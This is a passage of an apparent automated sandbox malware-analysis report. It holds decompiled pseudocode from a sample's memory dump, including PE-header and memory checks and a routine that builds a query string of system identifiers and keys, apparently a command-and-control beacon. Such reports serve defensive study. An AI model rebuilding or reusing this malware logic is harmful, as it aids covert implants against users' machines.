              												 *0x2cea3c8 = 0;
              												goto L5;
              											}
              											_t77 = 0xf;
              											__eflags = _t84 - _t77;
              											if(_t84 <= _t77) {
              												_t77 = _t84;
              											}
              											_t94 = 0;
              											__eflags = _t77;
              											if(_t77 < 0) {
              												L56:
              												__eflags = _t84 - 0x10;
              												if(_t84 < 0x10) {
              													_t86 = _t84 + 1;
              													__eflags = _t86;
              													 *0x2cea380 = _t86;
              												}
              												goto L58;
              											} else {
              												do {
              													_t68 = 0x2cea388 + _t94 * 4;
              													_t94 = _t94 + 1;
              													__eflags = _t94 - _t77;
              													 *_t68 = _t110;
              													_t110 =  *_t68;
              												} while (_t94 <= _t77);
              												goto L56;
              											}
              										}
              										_t69 = 0x2cea384 + _t84 * 4;
              										while(1) {
              											__eflags =  *_t69 - _t110;
              											if( *_t69 == _t110) {
              												goto L51;
              											}
              											_t93 = _t93 - 1;
              											_t69 = _t69 - 4;
              											__eflags = _t93;
              											if(_t93 > 0) {
              												continue;
              											}
              											goto L51;
              										}
              										goto L51;
              									}
              									_t87 = _v32;
              									__eflags =  *_t87 - 0x5a4d;
              									if( *_t87 != 0x5a4d) {
              										goto L59;
              									}
              									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
              									__eflags =  *_t71 - 0x4550;
              									if( *_t71 != 0x4550) {
              										goto L59;
              									}
              									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
              									if( *((short*)(_t71 + 0x18)) != 0x10b) {
              										goto L59;
              									}
              									_t78 = _t76 - _t87;
              									__eflags =  *((short*)(_t71 + 6));
              									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
              									if( *((short*)(_t71 + 6)) <= 0) {
              										goto L59;
              									}
              									_t72 =  *((intOrPtr*)(_t89 + 0xc));
              									__eflags = _t78 - _t72;
              									if(_t78 < _t72) {
              										goto L46;
              									}
              									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
              									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
              										goto L46;
              									}
              									__eflags =  *(_t89 + 0x27) & 0x00000080;
              									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
              										goto L20;
              									}
              									goto L46;
              								}
              							} else {
              								goto L16;
              							}
              							while(1) {
              								L16:
              								__eflags =  *((intOrPtr*)(0x2cea388 + _t58 * 4)) - _t110;
              								if( *((intOrPtr*)(0x2cea388 + _t58 * 4)) == _t110) {
              									break;
              								}
              								_t58 = _t58 + 1;
              								__eflags = _t58 - _t81;
              								if(_t58 < _t81) {
              									continue;
              								}
              								goto L18;
              							}
              							__eflags = _t58;
              							if(_t58 <= 0) {
              								goto L5;
              							}
              							 *0x2cea3c8 = 1;
              							__eflags =  *0x2cea3c8;
              							if( *0x2cea3c8 != 0) {
              								goto L5;
              							}
              							__eflags =  *((intOrPtr*)(0x2cea388 + _t58 * 4)) - _t110;
              							if( *((intOrPtr*)(0x2cea388 + _t58 * 4)) == _t110) {
              								L32:
              								_t100 = 0;
              								__eflags = _t58;
              								if(_t58 < 0) {
              									L34:
              									 *0x2cea3c8 = 0;
              									goto L5;
              								} else {
              									goto L33;
              								}
              								do {
              									L33:
              									_t90 = 0x2cea388 + _t100 * 4;
              									_t100 = _t100 + 1;
              									__eflags = _t100 - _t58;
              									 *_t90 = _t110;
              									_t110 =  *_t90;
              								} while (_t100 <= _t58);
              								goto L34;
              							}
              							_t25 = _t81 - 1; // -1
              							_t58 = _t25;
              							__eflags = _t58;
              							if(_t58 < 0) {
              								L28:
              								__eflags = _t81 - 0x10;
              								if(_t81 < 0x10) {
              									_t81 = _t81 + 1;
              									__eflags = _t81;
              									 *0x2cea380 = _t81;
              								}
              								_t28 = _t81 - 1; // 0x0
              								_t58 = _t28;
              								goto L32;
              							} else {
              								goto L25;
              							}
              							while(1) {
              								L25:
              								__eflags =  *((intOrPtr*)(0x2cea388 + _t58 * 4)) - _t110;
              								if( *((intOrPtr*)(0x2cea388 + _t58 * 4)) == _t110) {
              									break;
              								}
              								_t58 = _t58 - 1;
              								__eflags = _t58;
              								if(_t58 >= 0) {
              									continue;
              								}
              								break;
              							}
              							__eflags = _t58;
              							if(__eflags >= 0) {
              								if(__eflags == 0) {
              									goto L34;
              								}
              								goto L32;
              							}
              							goto L28;
              						}
              						_t75 =  *((intOrPtr*)(_t108 - 8));
              						__eflags = _t75 - _v8;
              						if(_t75 < _v8) {
              							goto L20;
              						}
              						__eflags = _t75 - _t108;
              						if(_t75 >= _t108) {
              							goto L20;
              						}
              						goto L15;
              					}
              					L5:
              					_t63 = 1;
              					goto L60;
              				} else {
              					goto L3;
              				}
              			}




































              0x02ce855b
              0x02ce855e
              0x02ce8564
              0x02ce8582
              0x00000000
              0x02ce8582
              0x02ce856c
              0x02ce8575
              0x02ce857b
              0x02ce858a
              0x02ce858d
              0x02ce8590
              0x02ce859a
              0x02ce859a
              0x02ce859c
              0x02ce859f
              0x02ce85a1
              0x02ce85a1
              0x02ce85a3
              0x02ce85a6
              0x00000000
              0x00000000
              0x02ce85a8
              0x02ce85aa
              0x02ce8610
              0x02ce8610
              0x02ce876e
              0x00000000
              0x02ce876e
              0x02ce85ac
              0x02ce85ac
              0x02ce85b0
              0x02ce85b2
              0x02ce85b2
              0x02ce85b2
              0x02ce85b2
              0x02ce85b5
              0x02ce85b6
              0x02ce85b9
              0x02ce85b9
              0x02ce85bd
              0x02ce85c1
              0x02ce85cf
              0x02ce85cf
              0x02ce85d7
              0x02ce85dd
              0x02ce85df
              0x02ce85e1
              0x02ce85f1
              0x02ce85fe
              0x02ce8602
              0x02ce8607
              0x02ce8609
              0x02ce8687
              0x02ce8687
              0x02ce860b
              0x02ce860b
              0x02ce860b
              0x02ce8689
              0x02ce868b
              0x02ce876c
              0x02ce876c
              0x00000000
              0x02ce8691
              0x02ce8691
              0x02ce8698
              0x00000000
              0x00000000
              0x02ce869e
              0x02ce86a2
              0x02ce86fe
              0x02ce8700
              0x02ce8708
              0x02ce870a
              0x02ce870c
              0x00000000
              0x00000000
              0x02ce870e
              0x02ce8714
              0x02ce8716
              0x02ce8718
              0x02ce872d
              0x02ce872d
              0x02ce872f
              0x02ce875e
              0x02ce8765
              0x00000000
              0x02ce8765
              0x02ce8733
              0x02ce8734
              0x02ce8736
              0x02ce8738
              0x02ce8738
              0x02ce873a
              0x02ce873c
              0x02ce873e
              0x02ce8752
              0x02ce8752
              0x02ce8755
              0x02ce8757
              0x02ce8757
              0x02ce8758
              0x02ce8758
              0x00000000
              0x02ce8740
              0x02ce8740
              0x02ce8740
              0x02ce8749
              0x02ce874a
              0x02ce874c
              0x02ce874e
              0x02ce874e
              0x00000000
              0x02ce8740
              0x02ce873e
              0x02ce871a
              0x02ce8721
              0x02ce8721
              0x02ce8723
              0x00000000
              0x00000000
              0x02ce8725
              0x02ce8726
              0x02ce8729
              0x02ce872b
              0x00000000
              0x00000000
              0x00000000
              0x02ce872b
              0x00000000
              0x02ce8721
              0x02ce86a4
              0x02ce86a7
              0x02ce86ac
              0x00000000
              0x00000000
              0x02ce86b5
              0x02ce86b7
              0x02ce86bd
              0x00000000
              0x00000000
              0x02ce86c3
              0x02ce86c9
              0x00000000
              0x00000000
              0x02ce86cf
              0x02ce86d1
              0x02ce86da
              0x02ce86de
              0x00000000
              0x00000000
              0x02ce86e4
              0x02ce86e7
              0x02ce86e9
              0x00000000
              0x00000000
              0x02ce86f0
              0x02ce86f2
              0x00000000
              0x00000000
              0x02ce86f4
              0x02ce86f8
              0x00000000
              0x00000000
              0x00000000
              0x02ce86f8
              0x00000000
              0x00000000
              0x00000000
              0x02ce85e3
              0x02ce85e3
              0x02ce85e3
              0x02ce85ea
              0x00000000
              0x00000000
              0x02ce85ec
              0x02ce85ed
              0x02ce85ef
              0x00000000
              0x00000000
              0x00000000
              0x02ce85ef
              0x02ce8617
              0x02ce8619
              0x00000000
              0x00000000
              0x02ce8629
              0x02ce862b
              0x02ce862d
              0x00000000
              0x00000000
              0x02ce8633
              0x02ce863a
              0x02ce8666
              0x02ce8666
              0x02ce8668
              0x02ce866a
              0x02ce867e
              0x02ce8680
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x02ce866c
              0x02ce866c
              0x02ce866c
              0x02ce8675
              0x02ce8676
              0x02ce8678
              0x02ce867a
              0x02ce867a
              0x00000000
              0x02ce866c
              0x02ce863c
              0x02ce863c
              0x02ce863f
              0x02ce8641
              0x02ce8653
              0x02ce8653
              0x02ce8656
              0x02ce8658
              0x02ce8658
              0x02ce8659
              0x02ce8659
              0x02ce865f
              0x02ce865f
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x02ce8643
              0x02ce8643
              0x02ce8643
              0x02ce864a
              0x00000000
              0x00000000
              0x02ce864c
              0x02ce864c
              0x02ce864d
              0x00000000
              0x00000000
              0x00000000
              0x02ce864d
              0x02ce864f
              0x02ce8651
              0x02ce8664
              0x00000000
              0x00000000
              0x00000000
              0x02ce8664
              0x00000000
              0x02ce8651
              0x02ce85c3
              0x02ce85c6
              0x02ce85c9
              0x00000000
              0x00000000
              0x02ce85cb
              0x02ce85cd
              0x00000000
              0x00000000
              0x00000000
              0x02ce85cd
              0x02ce8592
              0x02ce8594
              0x00000000
              0x00000000
              0x00000000
              0x00000000

              APIs
              • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 02CE8602
              Memory Dump Source
              • Source File: 00000000.00000002.568811195.0000000002CE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02CE0000, based on PE: true
              • Associated: 00000000.00000002.568806289.0000000002CE0000.00000004.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568818365.0000000002CE9000.00000002.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568822120.0000000002CEA000.00000004.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568826250.0000000002CEC000.00000002.10000000.00040000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_2ce0000_server.jbxd
              Similarity
              • API ID: MemoryQueryVirtual
              • String ID:
              • API String ID: 2850889275-0
              • Opcode ID: 3f567550f376798d3e9456905ad0aa65e906e9309db9d9ba727806bd4a9895fa
              • Instruction ID: 0abe27501faddc27363227e61aa3b52107c921a64df780325ec905690672a697
              • Opcode Fuzzy Hash: 3f567550f376798d3e9456905ad0aa65e906e9309db9d9ba727806bd4a9895fa
              • Instruction Fuzzy Hash: 2361F4B1600601CFDF29CF28C98072973A6FBC5358B248B29E417CB2B4EB35DA42CB50
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 71%
              			E02CE832C(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
              				intOrPtr _v8;
              				char _v12;
              				void* __ebp;
              				signed int* _t43;
              				char _t44;
              				void* _t46;
              				void* _t49;
              				intOrPtr* _t53;
              				void* _t54;
              				void* _t65;
              				long _t66;
              				signed int* _t80;
              				signed int* _t82;
              				void* _t84;
              				signed int _t86;
              				void* _t89;
              				void* _t95;
              				void* _t96;
              				void* _t99;
              				void* _t106;
              
              				_t43 = _t84;
              				_t65 = __ebx + 2;
              				 *_t43 =  *_t43 ^ __edx ^  *__eax;
              				_t89 = _t95;
              				_t96 = _t95 - 8;
              				_push(_t65);
              				_push(_t84);
              				_push(_t89);
              				asm("cld");
              				_t66 = _a8;
              				_t44 = _a4;
              				if(( *(_t44 + 4) & 0x00000006) != 0) {
              					_push(_t89);
              					E02CE8497(_t66 + 0x10, _t66, 0xffffffff);
              					_t46 = 1;
              				} else {
              					_v12 = _t44;
              					_v8 = _a12;
              					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
              					_t86 =  *(_t66 + 0xc);
              					_t80 =  *(_t66 + 8);
              					_t49 = E02CE8551(_t66);
              					_t99 = _t96 + 4;
              					if(_t49 == 0) {
              						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
              						goto L11;
              					} else {
              						while(_t86 != 0xffffffff) {
              							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
              							if(_t53 == 0) {
              								L8:
              								_t80 =  *(_t66 + 8);
              								_t86 = _t80[_t86 + _t86 * 2];
              								continue;
              							} else {
              								_t54 =  *_t53();
              								_t89 = _t89;
              								_t86 = _t86;
              								_t66 = _a8;
              								_t55 = _t54;
              								_t106 = _t54;
              								if(_t106 == 0) {
              									goto L8;
              								} else {
              									if(_t106 < 0) {
              										_t46 = 0;
              									} else {
              										_t82 =  *(_t66 + 8);
              										E02CE843C(_t55, _t66);
              										_t89 = _t66 + 0x10;
              										E02CE8497(_t89, _t66, 0);
              										_t99 = _t99 + 0xc;
              										E02CE8533(_t82[2]);
              										 *(_t66 + 0xc) =  *_t82;
              										_t66 = 0;
              										_t86 = 0;
              										 *(_t82[2])(1);
              										goto L8;
              									}
              								}
              							}
              							goto L13;
              						}
              						L11:
              						_t46 = 1;
              					}
              				}
              				L13:
              				return _t46;
              			}























              0x02ce8330
              0x02ce8331
              0x02ce8332
              0x02ce8335
              0x02ce8337
              0x02ce833a
              0x02ce833b
              0x02ce833d
              0x02ce833e
              0x02ce833f
              0x02ce8342
              0x02ce834c
              0x02ce83fd
              0x02ce8404
              0x02ce840d
              0x02ce8352
              0x02ce8352
              0x02ce8358
              0x02ce835e
              0x02ce8361
              0x02ce8364
              0x02ce8368
              0x02ce836d
              0x02ce8372
              0x02ce83f2
              0x00000000
              0x02ce8374
              0x02ce8374
              0x02ce8380
              0x02ce8382
              0x02ce83dd
              0x02ce83dd
              0x02ce83e3
              0x00000000
              0x02ce8384
              0x02ce8393
              0x02ce8395
              0x02ce8396
              0x02ce8397
              0x02ce839a
              0x02ce839a
              0x02ce839c
              0x00000000
              0x02ce839e
              0x02ce839e
              0x02ce83e8
              0x02ce83a0
              0x02ce83a0
              0x02ce83a4
              0x02ce83ac
              0x02ce83b1
              0x02ce83b6
              0x02ce83c2
              0x02ce83ca
              0x02ce83d1
              0x02ce83d7
              0x02ce83db
              0x00000000
              0x02ce83db
              0x02ce839e
              0x02ce839c
              0x00000000
              0x02ce8382
              0x02ce83f6
              0x02ce83f6
              0x02ce83f6
              0x02ce8372
              0x02ce8412
              0x02ce8419

              Memory Dump Source
              • Source File: 00000000.00000002.568811195.0000000002CE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02CE0000, based on PE: true
              • Associated: 00000000.00000002.568806289.0000000002CE0000.00000004.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568818365.0000000002CE9000.00000002.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568822120.0000000002CEA000.00000004.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568826250.0000000002CEC000.00000002.10000000.00040000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_2ce0000_server.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
              • Instruction ID: 668bd87a4bdbf280e4de98d66ae8e9f88914230b11d7a2c813882750b0587c02
              • Opcode Fuzzy Hash: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
              • Instruction Fuzzy Hash: 7221DD329002049FCF10DF68C8C09ABBBA5FF44350B458668DD5ADB255D730FA15CBE0
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 00000000.00000002.568856386.0000000002E48000.00000040.00000020.00020000.00000000.sdmp, Offset: 02E48000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_2e48000_server.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
              • Instruction ID: 273aa0ea1fa6cbeea4ade0eb2c5f458cdda410fd7162100f9cba049ca4f7ca3b
              • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
              • Instruction Fuzzy Hash: CD118E72380100AFD754DF55EC90EA673EAFB8C224B598165ED04CB356DA79E802CB60
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 76%
              			E02CE2B91(long __eax, intOrPtr _a4, void* _a8, void* _a16, void* _a20, void* _a24, intOrPtr _a32, void* _a40, intOrPtr _a44) {
              				intOrPtr _v4;
              				signed int _v8;
              				int* _v12;
              				char* _v16;
              				intOrPtr _v20;
              				void* _v24;
              				intOrPtr _v32;
              				intOrPtr _v36;
              				void* _v40;
              				void* __ebx;
              				void* __edi;
              				long _t68;
              				intOrPtr _t69;
              				intOrPtr _t70;
              				intOrPtr _t71;
              				intOrPtr _t72;
              				intOrPtr _t73;
              				void* _t76;
              				intOrPtr _t77;
              				int _t80;
              				intOrPtr _t81;
              				intOrPtr _t85;
              				intOrPtr _t86;
              				intOrPtr _t87;
              				void* _t89;
              				void* _t92;
              				intOrPtr _t96;
              				intOrPtr _t100;
              				intOrPtr* _t102;
              				int* _t108;
              				int* _t118;
              				char** _t120;
              				char* _t121;
              				intOrPtr* _t126;
              				intOrPtr* _t128;
              				intOrPtr* _t130;
              				intOrPtr* _t132;
              				intOrPtr _t135;
              				intOrPtr _t139;
              				int _t142;
              				intOrPtr _t144;
              				int _t147;
              				intOrPtr _t148;
              				int _t151;
              				void* _t152;
              				intOrPtr _t166;
              				void* _t168;
              				int _t169;
              				void* _t170;
              				void* _t171;
              				long _t172;
              				intOrPtr* _t173;
              				intOrPtr* _t174;
              				intOrPtr _t175;
              				intOrPtr* _t178;
              				char** _t181;
              				char** _t183;
              				char** _t184;
              				void* _t189;
              
              				_t68 = __eax;
              				_t181 =  &_v16;
              				_t152 = _a20;
              				_a20 = 8;
              				if(__eax == 0) {
              					_t68 = GetTickCount();
              				}
              				_t69 =  *0x2cea018; // 0x9300c086
              				asm("bswap eax");
              				_t70 =  *0x2cea014; // 0x3a87c8cd
              				asm("bswap eax");
              				_t71 =  *0x2cea010; // 0xd8d2f808
              				asm("bswap eax");
              				_t72 =  *0x2cea00c; // 0x81762942
              				asm("bswap eax");
              				_t73 =  *0x2cea348; // 0x256d5a8
              				_t3 = _t73 + 0x2ceb5ac; // 0x74666f73
              				_t169 = wsprintfA(_t152, _t3, 3, 0x3d18f, _t72, _t71, _t70, _t69,  *0x2cea02c,  *0x2cea004, _t68);
              				_t76 = E02CE467F();
              				_t77 =  *0x2cea348; // 0x256d5a8
              				_t4 = _t77 + 0x2ceb575; // 0x74707526
              				_t80 = wsprintfA(_t169 + _t152, _t4, _t76);
              				_t183 =  &(_t181[0xe]);
              				_t170 = _t169 + _t80;
              				if(_a24 != 0) {
              					_t148 =  *0x2cea348; // 0x256d5a8
              					_t8 = _t148 + 0x2ceb508; // 0x732526
              					_t151 = wsprintfA(_t170 + _t152, _t8, _a24);
              					_t183 =  &(_t183[3]);
              					_t170 = _t170 + _t151;
              				}
              				_t81 =  *0x2cea348; // 0x256d5a8
              				_t10 = _t81 + 0x2ceb89e; // 0x5258e46
              				_t153 = _t10;
              				_t189 = _a20 - _t10;
              				_t12 = _t81 + 0x2ceb246; // 0x74636126
              				_t164 = 0 | _t189 == 0x00000000;
              				_t171 = _t170 + wsprintfA(_t170 + _t152, _t12, _t189 == 0);
              				_t85 =  *0x2cea36c; // 0x52595b0
              				_t184 =  &(_t183[3]);
              				if(_t85 != 0) {
              					_t144 =  *0x2cea348; // 0x256d5a8
              					_t16 = _t144 + 0x2ceb8be; // 0x3d736f26
              					_t147 = wsprintfA(_t171 + _t152, _t16, _t85);
              					_t184 =  &(_t184[3]);
              					_t171 = _t171 + _t147;
              				}
              				_t86 = E02CE472F(_t153);
              				_a32 = _t86;
              				if(_t86 != 0) {
              					_t139 =  *0x2cea348; // 0x256d5a8
              					_t19 = _t139 + 0x2ceb8d0; // 0x736e6426
              					_t142 = wsprintfA(_t171 + _t152, _t19, _t86);
              					_t184 =  &(_t184[3]);
              					_t171 = _t171 + _t142;
              					HeapFree( *0x2cea2d8, 0, _a40);
              				}
              				_t87 = E02CE1340();
              				_a32 = _t87;
              				if(_t87 != 0) {
              					_t135 =  *0x2cea348; // 0x256d5a8
              					_t23 = _t135 + 0x2ceb8c5; // 0x6f687726
              					wsprintfA(_t171 + _t152, _t23, _t87);
              					_t184 =  &(_t184[3]);
              					HeapFree( *0x2cea2d8, 0, _a40);
              				}
              				_t166 =  *0x2cea3cc; // 0x5259600
              				_t89 = E02CE6B59(0x2cea00a, _t166 + 4);
              				_t172 = 0;
              				_a16 = _t89;
              				if(_t89 == 0) {
              					L30:
              					HeapFree( *0x2cea2d8, _t172, _t152);
              					return _a44;
              				} else {
              					_t92 = RtlAllocateHeap( *0x2cea2d8, 0, 0x800);
              					_a24 = _t92;
              					if(_t92 == 0) {
              						L29:
              						HeapFree( *0x2cea2d8, _t172, _a8);
              						goto L30;
              					}
              					E02CE2915(GetTickCount());
              					_t96 =  *0x2cea3cc; // 0x5259600
              					__imp__(_t96 + 0x40);
              					asm("lock xadd [eax], ecx");
              					_t100 =  *0x2cea3cc; // 0x5259600
              					__imp__(_t100 + 0x40);
              					_t102 =  *0x2cea3cc; // 0x5259600
              					_t168 = E02CE6675(1, _t164, _t152,  *_t102);
              					asm("lock xadd [eax], ecx");
              					if(_t168 == 0) {
              						L28:
              						HeapFree( *0x2cea2d8, _t172, _a16);
              						goto L29;
              					}
              					StrTrimA(_t168, 0x2ce9280);
              					_push(_t168);
              					_t108 = E02CE7563();
              					_v12 = _t108;
              					if(_t108 == 0) {
              						L27:
              						HeapFree( *0x2cea2d8, _t172, _t168);
              						goto L28;
              					}
              					_t173 = __imp__;
              					 *_t173(_t168, _a8);
              					 *_t173(_a4, _v12);
              					_t174 = __imp__;
              					 *_t174(_v4, _v24);
              					_t175 = E02CE6536( *_t174(_v12, _t168), _v20);
              					_v36 = _t175;
              					if(_t175 == 0) {
              						_v8 = 8;
              						L25:
              						E02CE63F6();
              						L26:
              						HeapFree( *0x2cea2d8, 0, _v40);
              						_t172 = 0;
              						goto L27;
              					}
              					_t118 = E02CE6F7D(_t152, 0xffffffffffffffff, _t168,  &_v24);
              					_v12 = _t118;
              					if(_t118 == 0) {
              						_t178 = _v24;
              						_v20 = E02CE597D(_t178, _t175, _v16, _v12);
              						_t126 =  *((intOrPtr*)(_t178 + 8));
              						 *((intOrPtr*)( *_t126 + 0x80))(_t126);
              						_t128 =  *((intOrPtr*)(_t178 + 8));
              						 *((intOrPtr*)( *_t128 + 8))(_t128);
              						_t130 =  *((intOrPtr*)(_t178 + 4));
              						 *((intOrPtr*)( *_t130 + 8))(_t130);
              						_t132 =  *_t178;
              						 *((intOrPtr*)( *_t132 + 8))(_t132);
              						E02CE61DA(_t178);
              					}
              					if(_v8 != 0x10d2) {
              						L20:
              						if(_v8 == 0) {
              							_t120 = _v16;
              							if(_t120 != 0) {
              								_t121 =  *_t120;
              								_t176 =  *_v12;
              								_v16 = _t121;
              								wcstombs(_t121, _t121,  *_v12);
              								 *_v24 = E02CE673A(_v16, _v16, _t176 >> 1);
              							}
              						}
              						goto L23;
              					} else {
              						if(_v16 != 0) {
              							L23:
              							E02CE61DA(_v32);
              							if(_v12 == 0 || _v8 == 0x10d2) {
              								goto L26;
              							} else {
              								goto L25;
              							}
              						}
              						_v8 = _v8 & 0x00000000;
              						goto L20;
              					}
              				}
              			}






























































              0x02ce2b91
              0x02ce2b91
              0x02ce2b95
              0x02ce2b9c
              0x02ce2ba6
              0x02ce2ba8
              0x02ce2ba8
              0x02ce2bb5
              0x02ce2bc0
              0x02ce2bc3
              0x02ce2bce
              0x02ce2bd1
              0x02ce2bd6
              0x02ce2bd9
              0x02ce2bde
              0x02ce2be1
              0x02ce2bed
              0x02ce2bfa
              0x02ce2bfc
              0x02ce2c02
              0x02ce2c07
              0x02ce2c12
              0x02ce2c14
              0x02ce2c17
              0x02ce2c1e
              0x02ce2c20
              0x02ce2c29
              0x02ce2c34
              0x02ce2c36
              0x02ce2c39
              0x02ce2c39
              0x02ce2c3b
              0x02ce2c40
              0x02ce2c40
              0x02ce2c48
              0x02ce2c4c
              0x02ce2c52
              0x02ce2c5d
              0x02ce2c5f
              0x02ce2c64
              0x02ce2c69
              0x02ce2c6c
              0x02ce2c71
              0x02ce2c7c
              0x02ce2c7e
              0x02ce2c81
              0x02ce2c81
              0x02ce2c83
              0x02ce2c8e
              0x02ce2c94
              0x02ce2c97
              0x02ce2c9c
              0x02ce2ca7
              0x02ce2ca9
              0x02ce2cb0
              0x02ce2cba
              0x02ce2cba
              0x02ce2cbc
              0x02ce2cc1
              0x02ce2cc7
              0x02ce2cca
              0x02ce2ccf
              0x02ce2cd9
              0x02ce2cdb
              0x02ce2cea
              0x02ce2cea
              0x02ce2cec
              0x02ce2cfa
              0x02ce2cff
              0x02ce2d01
              0x02ce2d07
              0x02ce2ee7
              0x02ce2eef
              0x02ce2efc
              0x02ce2d0d
              0x02ce2d19
              0x02ce2d1f
              0x02ce2d25
              0x02ce2eda
              0x02ce2ee5
              0x00000000
              0x02ce2ee5
              0x02ce2d31
              0x02ce2d36
              0x02ce2d3f
              0x02ce2d50
              0x02ce2d54
              0x02ce2d5d
              0x02ce2d63
              0x02ce2d70
              0x02ce2d7d
              0x02ce2d83
              0x02ce2ecd
              0x02ce2ed8
              0x00000000
              0x02ce2ed8
              0x02ce2d8f
              0x02ce2d95
              0x02ce2d96
              0x02ce2d9b
              0x02ce2da1
              0x02ce2ec3
              0x02ce2ecb
              0x00000000
              0x02ce2ecb
              0x02ce2dab
              0x02ce2db2
              0x02ce2dbc
              0x02ce2dc2
              0x02ce2dcc
              0x02ce2dde
              0x02ce2de0
              0x02ce2de6
              0x02ce2eff
              0x02ce2eae
              0x02ce2eae
              0x02ce2eb3
              0x02ce2ebf
              0x02ce2ec1
              0x00000000
              0x02ce2ec1
              0x02ce2df1
              0x02ce2df6
              0x02ce2dfc
              0x02ce2e07
              0x02ce2e12
              0x02ce2e16
              0x02ce2e1c
              0x02ce2e22
              0x02ce2e28
              0x02ce2e2b
              0x02ce2e31
              0x02ce2e34
              0x02ce2e39
              0x02ce2e3d
              0x02ce2e3d
              0x02ce2e4a
              0x02ce2e58
              0x02ce2e5d
              0x02ce2e5f
              0x02ce2e65
              0x02ce2e6b
              0x02ce2e6d
              0x02ce2e72
              0x02ce2e76
              0x02ce2e92
              0x02ce2e92
              0x02ce2e65
              0x00000000
              0x02ce2e4c
              0x02ce2e51
              0x02ce2e94
              0x02ce2e98
              0x02ce2ea2
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x02ce2ea2
              0x02ce2e53
              0x00000000
              0x02ce2e53
              0x02ce2e4a

              APIs
              • GetTickCount.KERNEL32 ref: 02CE2BA8
              • wsprintfA.USER32 ref: 02CE2BF5
              • wsprintfA.USER32 ref: 02CE2C12
              • wsprintfA.USER32 ref: 02CE2C34
              • wsprintfA.USER32 ref: 02CE2C5B
              • wsprintfA.USER32 ref: 02CE2C7C
              • wsprintfA.USER32 ref: 02CE2CA7
              • HeapFree.KERNEL32(00000000,?), ref: 02CE2CBA
              • wsprintfA.USER32 ref: 02CE2CD9
              • HeapFree.KERNEL32(00000000,?), ref: 02CE2CEA
                • Part of subcall function 02CE6B59: RtlEnterCriticalSection.NTDLL(052595C0), ref: 02CE6B75
                • Part of subcall function 02CE6B59: RtlLeaveCriticalSection.NTDLL(052595C0), ref: 02CE6B93
              • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 02CE2D19
              • GetTickCount.KERNEL32 ref: 02CE2D2B
              • RtlEnterCriticalSection.NTDLL(052595C0), ref: 02CE2D3F
              • RtlLeaveCriticalSection.NTDLL(052595C0), ref: 02CE2D5D
                • Part of subcall function 02CE6675: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,775EC740,02CE3ECE,00000000,05259600), ref: 02CE66A0
                • Part of subcall function 02CE6675: lstrlen.KERNEL32(00000000,?,775EC740,02CE3ECE,00000000,05259600), ref: 02CE66A8
                • Part of subcall function 02CE6675: strcpy.NTDLL ref: 02CE66BF
                • Part of subcall function 02CE6675: lstrcat.KERNEL32(00000000,00000000), ref: 02CE66CA
                • Part of subcall function 02CE6675: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,02CE3ECE,?,775EC740,02CE3ECE,00000000,05259600), ref: 02CE66E7
              • StrTrimA.SHLWAPI(00000000,02CE9280,?,05259600), ref: 02CE2D8F
                • Part of subcall function 02CE7563: lstrlen.KERNEL32(05259BF0,00000000,00000000,00000000,02CE3EF9,00000000), ref: 02CE7573
                • Part of subcall function 02CE7563: lstrlen.KERNEL32(?), ref: 02CE757B
                • Part of subcall function 02CE7563: lstrcpy.KERNEL32(00000000,05259BF0), ref: 02CE758F
                • Part of subcall function 02CE7563: lstrcat.KERNEL32(00000000,?), ref: 02CE759A
              • lstrcpy.KERNEL32(00000000,?), ref: 02CE2DB2
              • lstrcpy.KERNEL32(?,?), ref: 02CE2DBC
              • lstrcat.KERNEL32(?,?), ref: 02CE2DCC
              • lstrcat.KERNEL32(?,00000000), ref: 02CE2DD3
                • Part of subcall function 02CE6536: lstrlen.KERNEL32(?,00000000,05259DF8,00000000,02CE6F0A,0525A01B,43175AC3,?,?,?,?,43175AC3,00000005,02CEA00C,4D283A53,?), ref: 02CE653D
                • Part of subcall function 02CE6536: mbstowcs.NTDLL ref: 02CE6566
                • Part of subcall function 02CE6536: memset.NTDLL ref: 02CE6578
              • wcstombs.NTDLL ref: 02CE2E76
